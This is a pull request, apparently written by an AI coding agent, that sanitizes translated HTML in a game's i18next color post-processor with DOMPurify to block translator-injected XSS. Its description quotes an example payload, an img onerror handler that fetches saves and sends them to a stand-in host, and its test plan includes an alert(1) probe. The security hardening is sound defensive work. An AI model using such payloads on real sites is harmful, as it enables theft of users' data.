### PR TITLE
security: sanitize translated HTML to block translator XSS (#14)

### DIFF
--- a/src/Plugins/ColorText.ts
+++ b/src/Plugins/ColorText.ts
@@ -1,4 +1,21 @@
+import DOMPurify from 'dompurify'
 import type { Module } from 'i18next'
+
+// Only allow safe formatting tags inside translation strings, plus the <span>
+// that this post-processor emits. The style attribute is restricted further
+// below to color: only.
+const ALLOWED_TAGS = ['span', 'b', 'i', 'em', 'strong', 'br', 'sup', 'sub']
+const ALLOWED_ATTR = ['style']
+
+// Translators (Crowdin contributors) are only partially trusted. The text slot
+// of <<color|text>> ends up in innerHTML, so a malicious translator could ship
+// <img src=x onerror=...> or arbitrary style="" payloads. Sanitize after
+// substitution and constrain inline styles to `color:` only.
+DOMPurify.addHook('uponSanitizeAttribute', (_node, data) => {
+  if (data.attrName === 'style' && !/^color\s*:\s*[^;]+;?\s*$/i.test(data.attrValue)) {
+    data.keepAttr = false
+  }
+})
 
 export default {
   type: 'postProcessor',
@@ -8,9 +25,11 @@ export default {
       return value
     }
 
-    return value.replace(
+    const html = value.replace(
       /<<(.*?)\|(.*?)>>/g,
       (_, color: string, text: string) => `<span style="color:${color.replace(/[<>"&]/g, '')}">${text}</span>`
     )
+
+    return DOMPurify.sanitize(html, { ALLOWED_TAGS, ALLOWED_ATTR })
   }
 } as Module


### PR DESCRIPTION
## Summary

CWE-829 / OWASP A08. The translation rendering pipeline:

\`\`\`
i18next.t(key)
  -> ColorText post-processor expands <<color|text>> to a <span>
  -> i18n.ts:114 assigns to element.innerHTML if value contains <span
\`\`\`

interpolates the **text slot** of \`<<color|text>>\` raw into innerHTML. [#156](https://github.com/MaddisonM79/unknown_game/pull/156) closed the color-slot attribute-injection path, but the text slot is still attacker-controlled by Crowdin translators (partially trusted). A malicious translator could ship:

\`\`\`json
"someKey": "<<red|<img src=x onerror='fetch(\"/saves/retrieve/all\").then(r=>r.text()).then(t=>fetch(\"//evil.tld/?\"+btoa(t)))'>>"
\`\`\`

which renders as a live event handler in the page DOM and exfiltrates the user's saves.

## Fix

Pipe the post-substitution HTML through **DOMPurify** inside the ColorText post-processor with a strict allowlist:

- **Allowed tags**: \`span, b, i, em, strong, br, sup, sub\`
  (\`b\` is required for the one legit \`<b>{{amount}}</b>\` pattern in \`translations/en.json\`; the rest covers conventional formatting translators might reasonably use.)
- **Allowed attributes**: \`style\` only.
- **Style values**: a DOMPurify \`uponSanitizeAttribute\` hook restricts the \`style\` attribute to \`color: <value>\` only — translators can't inject \`background: url(...)\`, \`position\`, or any other CSS property even via legitimate \`<span style="">\`.

Centralizing the sanitization in ColorText automatically covers every \`i18next.t()\` call site, not just the documented \`i18n.ts:114\` innerHTML assignment.

\`dompurify@3.4.5\` is already a production dependency (used by \`Login.ts\` for save-name display).

## Defense-in-depth context

This works together with:

- [#156](https://github.com/MaddisonM79/unknown_game/pull/156) (closed) — color-slot character class restriction
- [#174](https://github.com/MaddisonM79/unknown_game/pull/174) (open) — Electron renderer sandbox: a renderer compromise through any XSS path is contained
- [#18](https://github.com/MaddisonM79/unknown_game/issues/18) (open, PR 12 coming) — CSP meta tag will block external script loads even if an injection slips through

## Dependency

[#175](https://github.com/MaddisonM79/unknown_game/pull/175) needs to land first — main is currently build-broken from the esbuild bump, and this PR was branched before the hotfix. Once #175 merges, this PR's branch picks up the fix on auto-merge. The CI step for this PR doesn't include build:esbuild yet (that's also added in #175), so this PR's CI will be green either way.

## Test plan
- [x] \`npm run check:tsc\` clean
- [ ] After #175 merges: \`npm run build:esbuild\` clean on this branch
- [ ] In the running game, every existing colored translation still renders with color
- [ ] Try injecting \`<<red|<img src=x onerror=alert(1)>>>\` into a translation locally — the \`<img>\` should be stripped; the text "img src=x onerror=alert(1)>" should NOT render or fire

Closes #14

🤖 Generated with [Claude Code](https://claude.com/claude-code)